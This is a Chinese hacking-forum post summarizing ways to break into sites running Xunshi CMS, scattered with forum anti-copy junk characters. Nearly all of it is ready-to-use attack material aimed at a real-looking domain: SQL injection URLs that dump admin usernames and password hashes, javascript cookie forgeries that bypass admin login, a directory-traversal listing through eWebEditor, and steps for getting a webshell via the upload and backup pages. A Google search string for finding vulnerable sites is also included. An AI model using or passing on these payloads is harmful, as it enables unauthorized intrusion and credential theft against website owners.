讯时漏洞总结

admin

by:血封忆尘

1 c, [3 ~5 ], L# C  Y* e在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）
* ^' V# w7 j9 E2 u$ u9 Z
7 I( l9 B% B, f2 \& q9 M7 n以下本文总结来自黑防去年第9期杂志上的内容...

先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

) Q& W; C; }" O: ]26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2 Y% h  B" o7 ]7 g2 r3 G( f
记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
0 l* ^# h4 g' ]6 `0 a+ u这里一个注入
# Q0 k) S. Z0 h' h" z" I
效果如图:
- @9 c4 c% ~1 i


这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

. F1 Q9 Z% J' M" b" h: |, i# S密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
' O; X& u5 E% B3 Z3 u$ h+ B* T
7 o/ w  ^7 d1 g8 d# n3 Y4 Hjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
- f4 V8 E+ {% ?0 w8 w) Z( j& F4 q( ^
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

/ Q- U' G$ e, t5 _- x因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
7 g& l- _* Z% s
+ m  a0 o/ d2 ^4 o9 a. b7 ?它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以

访问这页面来列目录..步骤如下:
, [. R! [1 W  {$ i
2 d) }9 J  W; L7 t5 _, bjavascript:alert(document.cookie="admindj=1")

6 z3 u& ~# \3 k! Z1 h; K; O0 }6 ]http://www.political-security.co ... asp?id=46&dir=../..
0 M+ t% c; L2 u! E
效果如图:
" w9 ]/ o$ B/ J5 p3 F& I

+ [+ @: n0 Y3 b4 W
4 g2 F& J. }1 w3 n6 |/ K+ F4 \这样全站目录都能瞧了..找到后台目录..进去..
$ b% k0 q$ M# v, K9 C
那么进了后台怎么拿shell？？上传--备份就ok了..
# F. O, B, u$ D  I# p- t
) |0 O1 P! K/ _1 G那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

/ C7 Q0 _9 i$ u9 O# d2 M1 {- ?& {6 b这个我也碰到过一次..你都可以通过列目录来实现..

3 H4 q# T0 ?2 @. djavascript:alert(document.cookie="admindj=1")

http://www.political-security.co ... p?action=BackupData
3 ^1 R5 K/ p4 Q! _
备份ok..
0 S/ C, n- N3 g8 T% T
) t& i( j. J- a# [9 v那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?

在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
$ [. {$ z! {7 k2 z- S% k
! B3 G% T! s7 a( j) m然后访问此页面进行注入..步骤如下:
) Q  S/ L" m- O) m
4 h6 J! g+ u+ [- P5 E- D4 d, ^$ pjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
; g7 t( w% V$ E# {2 D- e
, q% l% R8 `. Q8 p3 g5 [  ~然后请求admin/admin_chk.asp页面
1 S$ m; l& `# b5 J; s5 J
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
/ S( C3 Q9 ^3 E& W) z
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
( Z9 Z5 c& a. i
: O/ c* n* G7 Z- _2 C$ V. s6 {. Z效果如图所示:
- I% p0 |- A; V' r* b0 M

- @, f1 x4 `  C: c
$ R2 J, d; ~: W) p4 H讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）

+ Y6 e4 B% ]* N* `/ v1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句

2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！
( q, P; t3 C: H3 M( Z


3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
4 c0 t# k) x( f- G2 t$ h& V; q
3 k, l) Q5 @7 j: B/ G
7 f+ F5 A2 X. E" k& L
爆出管理员帐号和密码了
4 _/ ]  a* b) @) E6 b1 U
- A3 Q  Z* h4 a& N+ E0 p
8 t2 {& j" L9 [' I- W% ?$ a
4、cookies进后台
8 {$ p: X6 B; x- P9 f
9 `7 q9 B8 `+ \' o4 l7 Q9 @javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
" D4 ]  U' p# m


9 F, o$ \! h+ x+ G2 Q7 s5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
& Q9 p8 E1 a7 r3 w' e3 l
0 r, M9 P: i3 Z, Q
7 C1 \0 }/ l" }( `$ w4 ?
8 N: m: ^; m# q$ r% }( P0 f6、后台有上传和备份取SHELL不难。

% t  [7 j% v- d: K% F: Z5 f: W7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

+ m; {( Y+ ~9 r. B: r" ?逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
7 P' Y4 B4 Z& J' l; B4 i

* {) u+ b+ P9 v6 t. G: H  n5 X; W